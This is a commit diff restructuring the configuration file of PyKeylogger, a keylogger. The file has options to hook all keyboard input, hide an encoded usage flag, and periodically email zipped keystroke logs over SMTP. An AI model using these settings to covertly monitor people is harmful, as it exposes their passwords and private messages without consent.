throw in the use of directory locks to avoid thread conflicts refactor the .ini and .val files with extra hierarchy use initial underscores to mark hidden .ini entries some other cleanup

--- a/pykeylogger.ini
+++ b/pykeylogger.ini
@@ -18,25 +18,43 @@ Log Directory = logs
 Hook Keyboard Tooltip = Log keyboard input (if you set this to False, the keylogger will basically do nothing).
 Hook Keyboard = True
 
-# default: False
-Parse Backspace Tooltip = Translate backspace chacarter into printable string (for Notepad compatibility) (Not currently supported on linux)
-Parse Backspace = False
-
-# default: False
-Parse Escape Tooltip = Translate escape chacarter into printable string (for Notepad compatibility) (Not currently supported on linux)
-Parse Escape = False
-
-# default: F11;F12
+# default: Control_L;Control_R;F12
 Control Key Tooltip = Specify the key combo to press to bring up control panel. Separate multiple keys of the combo with semicolon ";". Some good keys to include are [On Windows: "Lmenu", "Rmenu" (left and right Alt keys), "Lcontrol", "Rcontrol", "Lshift", "Rshift"] [On Linux: "Alt_L", "Alt_R" (left and right Alt keys), "Control_L", "Control_R", "Shift_L", "Shift_R", "Super_L", "Super_R" (left and right meta/windows keys)] [On Both: "Escape", "Delete", "Insert", "F1" through "F12", any number of regular alphanumeric keys (can't use the semicolon as one of the keys).] Make it as complex as you want - just make sure you have enough fingers. :)
 Control Key = Control_L;Control_R;F12
 
 # default: None
-Applications Not Logged Tooltip = Specify one or more applications by full path name whose input will not be logged. Separate multiple applications with semicolon ";". Leave as "None" to log all applications.
-Applications Not Logged = None
+System Log Tooltip = Log some debug/informational output, to a systemlog file (filename specified here), inside directory specified with "Log Directory". Set to "None" to disable.
+System Log = None
+
+_Usage Time Flag Tooltip = No tips
+_Usage Time Flag = eJxLyywqLiktTgUAD3wDdg==
+
+[Detailed Log Writer]
+
+[[General]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = DetailedLogWriterFirstStage
+
+# default: detailedlog
+Log Subdirectory Tooltip = Use this subdirectory inside the main log directory for this logger.
+Log Subdirectory = detailed_log
 
 # default: logfile.txt
-Log File Tooltip = Log all output to the file (filename specified here) inside directory specified with "Log Directory".
-Log File = logfile.txt
+Log Filename Tooltip = Log all output to the file (filename specified here) inside directory specified with "Log Directory".
+Log Filename = logfile.txt
+
+# default: False
+Parse Backspace Tooltip = Translate backspace chacarter into printable string (for Notepad compatibility)
+Parse Backspace = False
+
+# default: False
+Parse Escape Tooltip = Translate escape chacarter into printable string (for Notepad compatibility)
+Parse Escape = False
+
+# default: None
+Applications Not Logged Tooltip = Specify one or more applications by full path name whose input will not be logged. Separate multiple applications with semicolon ";". Leave as "None" to log all applications.
+Applications Not Logged = None
 
 # default: |
 Log File Field Separator Tooltip = Character(s) to use as the field separator in the log file.
@@ -54,14 +72,8 @@ Limit Keylog Field Size = 0
 Non-printing Character Representation Tooltip = How to represent non-printing characters in the log (such as various function and control keys). The string you set here will be printed every time any non-printing key is pressed. The following variables are interpreted: "%keyname%" variable inserts the name of the key pressed, "%scancode%" inserts the scan code, %vkcode% inserts the virtual key code.
 Non-printing Character Representation = [KeyName:%keyname%]
 
-# default: None
-System Log Tooltip = Log some debug/informational output, to a systemlog file (filename specified here), inside directory specified with "Log Directory". Set to "None" to disable.
-System Log = None
 
-Usage Time Flag NoDisplay Tooltip = No tips
-Usage Time Flag NoDisplay = eJxLyywqLiktTgUAD3wDdg==
-
-[E-mail]
+[[E-mail]]
 
 # default: False
 SMTP Send Email Tooltip = Set to True to enable automatic periodic emails of a zipped archive of logfiles.
@@ -113,7 +125,7 @@ SMTP Message Body = Please see attached zipfile.
 Email Interval Tooltip = Specify the time interval between automatic log email events, in HOURS.
 Email Interval = 4.0
 
-[Zip]
+[[Zip]]
 
 # default: False
 Zip Enable Tooltip = Set this to true to enable automatic zipping of logfiles to dated archives (and deletion of files that have been zipped).
@@ -159,7 +171,7 @@ Zip Interval = 4.0
 #~ FTP Interval Tooltip = Set this to the time interval between automatic FTP events, in HOURS.
 #~ FTP Interval = 4.0
 
-[Log Maintenance]
+[[Log Maintenance]]
 
 # default: False
 Delete Old Logs Tooltip = Set to True to enable automatic deletion of old logs.
